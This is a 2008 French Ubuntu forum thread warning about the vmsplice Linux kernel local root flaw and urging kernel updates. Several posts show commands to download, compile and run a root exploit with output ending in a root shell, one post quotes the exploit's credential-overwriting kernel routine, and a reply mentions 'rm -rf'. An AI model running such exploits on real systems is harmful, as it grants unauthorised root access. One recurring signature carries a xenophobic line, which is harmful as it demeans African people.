Contenu | Rechercher | Menus

Annonce

Si vous rencontrez des soucis à rester connecté sur le forum (ou si vous avez perdu votre mot de passe) déconnectez-vous et reconnectez-vous depuis cette page, en cochant la case "Me connecter automatiquement lors de mes prochaines visites".
Test de l'ISO d'Ubuntu francophone : nous avons besoin de testeurs pour la version francophone d'Ubuntu 14.04. Liens et informations ici.

Attention, une faille de sécurité dans bash a récemment été rapportée, il est recommandé de mettre à jour son système (plus de détails)

#1 Le 11/02/2008, à 11:37

HymnToLife

[ATTENTION] Faille de sécurité critique dans le noyau Linux !

EDIT : Un correctif est - enfin - disponible dans les dépà´ts Ubuntu. Faites vos mises à  jour en suivant la procédure habituelle et tout devrait rentrer dans l'ordre.
~~~~~

Une importante faille de sécurité a été découverte dans le noyau Linux, pour les versions 2.6.17 à  2.6.24.1 incluses. Cette faille permet à  n'importe quel utilisateur disposant d'un accès à  la machine QUEL QU'IL SOIT d'obtenir les droits de superutilisateur TRàˆS SIMPLEMENT.

à€ la minute o๠j'écris ceci, aucun correctif n'a été appliqué au noyau présent dans les dépà´ts d'Ubuntu Gutsy, et le seul moyen de se prémunir contre cette faille est de compiler manuellement un noyau 2.6.24.2 ou supérieur comme expliqué par exemple ici.

Pour les heureux possesseurs d'un Asus EeePC, je dispose de paquets DEB d'un 2.6.24.2 que je peux mettre à  disposition si ça intéresse.

Les noyaux 2.6.22.18 et 2.6.23.16 corrigent également la faille (notez que ces numérotations sont celles des noyaux officiels, et n'ont rien à  voir avec celles employées dans la plupart des distributions).


Si vous voulez vérifier par vous-mêmes, il vous suffit d'intaller le paquet build-essential puis de télécharger et compiler un petit programme C en lançant ces commandes (ce programme n'affectera en rien votre système, il se contente de donner un shell root) :

wget <lien supprimé> -O rootexploit.c
gcc -o rootexploit rootexploit.c
./rootexploit
firas@nobue ~ % uname -r
2.6.22-14-generic
firas@nobue ~ % wget <lien modéré, demandez en privé a l'auteur si vous le voulez> -O rootexploit.c
--18:52:56--  <lien modéré, demandez en privé a l'auteur si vous le voulez>
           => `rootexploit.c'
Resolving paste.ubuntu-nl.org... 81.171.100.21
Connecting to paste.ubuntu-nl.org|81.171.100.21|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]

    [ <=>                                                                         ] 7,336         --.--K/s

18:52:57 (53.24 KB/s) - `rootexploit.c' saved [7336]

firas@nobue ~ % gcc -o rootexploit rootexploit.c
firas@nobue ~ % ./rootexploit
-----------------------------------
 Linux vmsplice Local Root Exploit
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e13000 .. 0xb7e45000
[+] root
root@nobue:~# whoami
root
root@nobue:~#

Dernière modification par HymnToLife (Le 12/02/2008, à 19:37)


- Rodrigue, as-tu du cœur ?
- Non, mais j'ai du pique !

Hors ligne

#2 Le 11/02/2008, à 11:41

Skippy le Grand Gourou

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

Ouah ! big_smile


Mais quand vont-ils tous se taire ?? (De l'indécence médiatique et de sa justification des crimes violents)
Touristes africains, vous n'êtes pas les bienvenus en France.
 

Hors ligne

#3 Le 11/02/2008, à 11:43

HymnToLife

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

Skippy le Grand Gourou a écrit :

Ouah ! big_smile

J'aurais dû planquer un <bout de code malicieux> dedans lol

Dernière modification par calimarno (Le 11/02/2008, à 19:40)


- Rodrigue, as-tu du cœur ?
- Non, mais j'ai du pique !

Hors ligne

#4 Le 11/02/2008, à 11:44

Koshie-2.0

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

Expliquez moi la blague s'il vous plaà®t tongue !

#5 Le 11/02/2008, à 11:45

HymnToLife

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

koshie666 a écrit :

Expliquez moi la blague s'il vous plaà®t tongue !

Ce n'est pas une blague, c'est très, très, très sérieux ! Fais et tu verras.


- Rodrigue, as-tu du cœur ?
- Non, mais j'ai du pique !

Hors ligne

#6 Le 11/02/2008, à 11:51

philpep-tlse

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

Et alors, j'ai justement appris a ne pas exécuter du code de source non sûre.

Donc si quelqu'un pouvais expliquer pour les gens qui ne lisent pas le C (comme moi)


le "lol" est aux boulets ce que le ";" est aux programmeurs
blog | Wiki Fvwm | Essayez le Window Manager From Scatch | Topic WMFS

Hors ligne

#7 Le 11/02/2008, à 11:51

Skippy le Grand Gourou

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

HymnToLife a écrit :
Skippy le Grand Gourou a écrit :

Ouah ! big_smile

J'aurais dû planquer un <bout de code malicieux> dedans lol

lol

J'ai eu un moment de doute et ouvert la source avant de le lancer, et je me suis dit "bof, c'est HTL... Et si il s'était fait pirater son compte ? Allez, ce sera l'occasion de réinstaller, ça tombe bien je suis surmené en ce moment... à‡a de plus ou de moins..." tongue

Dernière modification par calimarno (Le 11/02/2008, à 19:40)


Mais quand vont-ils tous se taire ?? (De l'indécence médiatique et de sa justification des crimes violents)
Touristes africains, vous n'êtes pas les bienvenus en France.
 

Hors ligne

#8 Le 11/02/2008, à 11:52

Skippy le Grand Gourou

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

philpep-tlse a écrit :

Et alors, j'ai justement appris a ne pas exécuter du code de source non sûre.

Donc si quelqu'un pouvais expliquer pour les gens qui ne lisent pas le C (comme moi)

Et personne ne t'a dit que tu pouvais avoir confiance envers les piliers de bar comme HTL ? lol

à‡a passe ton terminal en superutilisateur. yikes


Mais quand vont-ils tous se taire ?? (De l'indécence médiatique et de sa justification des crimes violents)
Touristes africains, vous n'êtes pas les bienvenus en France.
 

Hors ligne

#9 Le 11/02/2008, à 11:56

HymnToLife

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

philpep-tlse a écrit :

Et alors, j'ai justement appris a ne pas exécuter du code de source non sûre.

Donc si quelqu'un pouvais expliquer pour les gens qui ne lisent pas le C (comme moi)

firas@mamirin ~ % uname -r
2.6.24.1-mamirin
firas@mamirin ~ % gcc -o rootexploit rootexploit.c
firas@mamirin ~ % ./rootexploit
-----------------------------------
 Linux vmsplice Local Root Exploit
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d66000 .. 0xb7d98000
[+] root
root@mamirin:~#

- Rodrigue, as-tu du cœur ?
- Non, mais j'ai du pique !

Hors ligne

#10 Le 11/02/2008, à 11:57

philpep-tlse

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

Skippy le Grand Gourou a écrit :
philpep-tlse a écrit :

Et alors, j'ai justement appris a ne pas exécuter du code de source non sûre.

Donc si quelqu'un pouvais expliquer pour les gens qui ne lisent pas le C (comme moi)

Et personne ne t'a dit que tu pouvais avoir confiance envers les piliers de bar comme HTL ? lol

à‡a passe ton terminal en superutilisateur. yikes

En même temps tu m'aurais dit que ça fait du café je ne t'aurais pas cru non plus.
Puis les mises a jours c'est pas pour les chiens.


EDITH, ok je vois, mais c'est hyper grave comme problème ! En gros n'importe quel programme lancé en utilisateur normal peut avoir un accès Root sur la machine... Heureusement je suis encore en 2.6.23, y'a des explication à  cette énormité ?

REEDITH, du 2.6.17 au 2.6.24-1 ?? Damned ! Y'a un lien officiel, genre Torvalds qui pleure en nous disant ça ?

Dernière modification par philpep-tlse (Le 11/02/2008, à 12:03)


le "lol" est aux boulets ce que le ";" est aux programmeurs
blog | Wiki Fvwm | Essayez le Window Manager From Scatch | Topic WMFS

Hors ligne

#11 Le 11/02/2008, à 12:00

Skippy le Grand Gourou

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

philpep-tlse a écrit :

Puis les mises a jours c'est pas pour les chiens.

Sauf que le noyau 2.6.17 est là  depuis un bon moment déjà  (au moins Edgy). Et si tu es sous Edgy par exemple, a priori pas de MAJ du noyau disponible (ou je me trompe ?)... hmm


Mais quand vont-ils tous se taire ?? (De l'indécence médiatique et de sa justification des crimes violents)
Touristes africains, vous n'êtes pas les bienvenus en France.
 

Hors ligne

#12 Le 11/02/2008, à 12:02

HymnToLife

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

philpep-tlse a écrit :

EDITH, ok je vois, mais c'est hyper grave comme problème ! En gros n'importe quel programme lancé en utilisateur normal peut avoir un accès Root sur la machine... Heureusement je suis encore en 2.6.23, y'a des explication à  cette énormité ?

Nobody's perfect, les devs sont humains, ils ne peuvent pas penser à  tout wink Et comme j'ai dit, ça affecte toutes les versions de la 2.6.17 à  la 2.6.24.1, donc tu ferais bien de mettre à  jour ton 2.6.23 fissa...

Dernière modification par HymnToLife (Le 11/02/2008, à 12:03)


- Rodrigue, as-tu du cœur ?
- Non, mais j'ai du pique !

Hors ligne

#13 Le 11/02/2008, à 12:05

Zelfy

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

le root exploit... le grand méchant loup de GNU/linux.

Utile quand on a oublier son MDP root big_smile

Dernière modification par Zelfy (Le 11/02/2008, à 12:06)


On s'aperçoit qu'on est devenu un spécialiste quand les choses dont on parle avec plaisir ennuient les autres
-+- Gilbert Cesbron (1913-1979), de petites choses.-+-

Lug du Léman

Hors ligne

#14 Le 11/02/2008, à 12:08

Koshie-2.0

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

Je n'ai jamais encore fait ça donc je vais passer pour un con, mais comment on met à  jour son noyau? C'est long? Compliqué? Risqué?

Merci tongue !

#15 Le 11/02/2008, à 12:10

HymnToLife

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

http://doc.ubuntu-fr.org/tutoriel/comment_compiler_un_kernel_de_kernel.org?s=noyau


- Rodrigue, as-tu du cœur ?
- Non, mais j'ai du pique !

Hors ligne

#16 Le 11/02/2008, à 12:14

Koshie-2.0

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

Merci mon chou big_smile ! Je ferais ça cette aprèm ou demain quand j'aurais deux bonne heures de libre.

Dernière modification par koshie666 (Le 11/02/2008, à 12:17)

#17 Le 11/02/2008, à 12:17

philpep-tlse

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

static uint uid, gid;

void    kernel_code()
{
        int     i;
        uint    *p = get_current();

        for (i = 0; i < 1024-13; i++) {
                if (p[0] == uid && p[1] == uid &&
                    p[2] == uid && p[3] == uid &&
                    p[4] == gid && p[5] == gid &&
                    p[6] == gid && p[7] == gid) {
                        p[0] = p[1] = p[2] = p[3] = 0;
                        p[4] = p[5] = p[6] = p[7] = 0;
                        p = (uint *) ((char *)(p + 8) + sizeof(void *));
                        p[0] = p[1] = p[2] = ~0;
                        break;
                }
                p++;
        }

        exit_kernel();

Hum, c'est pas du fake root tous ses uid qui valent 0 ? ça me parait bizarre comme truc... En même temps j'y connais pas grand chose. Quand j'aurais du courage je l'exécute ! Si tu pouvais m'expliquer les grandes lignes du code.

EDITH, il est limité quand même ton rootexploit, pas possible de faire un fdisk. J'ai pas éssayé un <bout de code malicieux> mais ça me parrait être du fakeroot.

EDITH2 > et le $HOME du faux root c'est le même que celui de l'user.

Tu voudrais pas nous faire compiler des kernel pour rien par hasard ?

Dernière modification par calimarno (Le 11/02/2008, à 19:41)


le "lol" est aux boulets ce que le ";" est aux programmeurs
blog | Wiki Fvwm | Essayez le Window Manager From Scatch | Topic WMFS

Hors ligne

#18 Le 11/02/2008, à 12:28

Skippy le Grand Gourou

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

philpep-tlse a écrit :

EDITH, il est limité quand même ton rootexploit, pas possible de faire un fdisk. J'ai pas éssayé un rm -rf mais ça me parrait être du fakeroot.

EDITH2 > et le $HOME du faux root c'est le même que celui de l'user.

Ben chez moi je peux toucher au fstab ou à grub, quand même... neutral


Mais quand vont-ils tous se taire ?? (De l'indécence médiatique et de sa justification des crimes violents)
Touristes africains, vous n'êtes pas les bienvenus en France.
 

Hors ligne

#19 Le 11/02/2008, à 12:33

philpep-tlse

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

Ouais, ça reste dangereux car le rm sur des fichier sur lesquel seul root à  des droits marche assez bien...

Qui est l'heureux créateur de ce code ?


le "lol" est aux boulets ce que le ";" est aux programmeurs
blog | Wiki Fvwm | Essayez le Window Manager From Scatch | Topic WMFS

Hors ligne

#20 Le 11/02/2008, à 12:42

winael

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

Bon dès ce soir je regarde en quel noyau je suis... etonnant que personne n'est découvert la faille avant neutral ca fait peur


Libre, non pas comme dans entrée libre, mais comme dans Liberté
(Bouyop)Mon PC c 1 MAC boulet ! G pas windows, donc je pe pas intaller linux !
(pankkake) Windows VISTA : Virus, Infections, Spyware, Trojans, Adware.
OPEN your mind, you'll discover a FREE world

Hors ligne

#21 Le 11/02/2008, à 12:43

Skippy le Grand Gourou

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

Oui, je trouve rien concernant cette faille sur le net, elle sort d'o๠? C'est toi qu'a écris le code ? T'as prévenu Linus & Cie ? Le 2.6.24.2 corrige bien cette faille ?

Dernière modification par Skippy le Grand Gourou (Le 11/02/2008, à 12:43)


Mais quand vont-ils tous se taire ?? (De l'indécence médiatique et de sa justification des crimes violents)
Touristes africains, vous n'êtes pas les bienvenus en France.
 

Hors ligne

#22 Le 11/02/2008, à 12:45

HymnToLife

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

Skippy le Grand Gourou a écrit :

Oui, je trouve rien concernant cette faille sur le net, elle sort d'o๠? C'est toi qu'a écris le code ? T'as prévenu Linus & Cie ? Le 2.6.24.2 corrige bien cette faille ?

Tu as mal cherché... Et oui, le 2.6.24.2 corrige ça :

http://it.slashdot.org/it/08/02/10/2011257.shtml
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.2


- Rodrigue, as-tu du cœur ?
- Non, mais j'ai du pique !

Hors ligne

#23 Le 11/02/2008, à 12:49

winael

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

question con si on fait ses mise à  jour auto comme il faut on est bon ou pas ? roll


Libre, non pas comme dans entrée libre, mais comme dans Liberté
(Bouyop)Mon PC c 1 MAC boulet ! G pas windows, donc je pe pas intaller linux !
(pankkake) Windows VISTA : Virus, Infections, Spyware, Trojans, Adware.
OPEN your mind, you'll discover a FREE world

Hors ligne

#24 Le 11/02/2008, à 12:51

Luckynow

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

Il y aura un patch pour le 2.6.22 ?
Pas envie de passer en unstable juste pour une histoire de kernel....
J'ai lu le bugzilla de gentoo, c'est patché pour le 2.6.24 mais quid des précédents ?
Ceci dit ça reste un exploit local, faut déjà  vouloir éxécuter un virus pour y arriver.
Edit c'est fait dans le 2.6.22.18, a savoir maintenant combien de temps il faudra attendre pour qu'il attérisse dans les mise à  jour de gutsy

Dernière modification par Luckynow (Le 11/02/2008, à 13:01)

Hors ligne

#25 Le 11/02/2008, à 12:54

HymnToLife

Re : [ATTENTION] Faille de sécurité critique dans le noyau Linux !

winael a écrit :

question con si on fait ses mise à  jour auto comme il faut on est bon ou pas ? roll

Pour le moment non, mais je pense que ça va venir. M'étonnerait que les devs d'Ubuntu laissent ça.


- Rodrigue, as-tu du cœur ?
- Non, mais j'ai du pique !

Hors ligne

Haut de page ↑